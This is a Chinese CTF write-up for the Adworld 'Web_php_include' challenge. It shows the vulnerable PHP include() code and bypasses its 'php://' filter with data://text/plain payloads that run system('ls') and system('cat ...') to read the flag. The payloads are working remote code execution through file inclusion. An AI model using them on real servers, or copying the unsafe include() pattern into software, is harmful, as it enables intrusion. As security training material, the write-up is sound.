攻防世界 web进阶区 Web_php_include

攻防世界 web进阶区 Web_php_include

打开链接,直接是代码审计
在这里插入图片描述

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

从代码中可以知道,可以有两个get参数请求,分别是hello和page,hello的参数直接返回,我们主要看page参数的处理。
strstr()函数会检测$page参数中是否存在php://,如果存在,则进入循环,否则返回false,str_replace()函数会将page中的’hp://替换为空,因为是while循环,所以会替换所有的php://,包括拼接的。
由此可知该题考查的是php伪协议的利用,这里可以进行大小写绕过,同时还可以使用另一个伪协议data://text/plain,我们使用data://text/plain这个伪协议,构造如下的payload,用于查看服务器的文件:

?page=data://text/plain,<?php%20system(“ls“);?>

在这里插入图片描述
flag在文件fl4gisisish3r3.php中,查看这个文件的内容。
构造的payload为:

?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php");?>

此时页面不会显示任何的东西,flag在源码中。F12或者检查网页源码即可获得flag。
检查网页源码
在这里插入图片描述
F12
在这里插入图片描述
最终flag为:ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值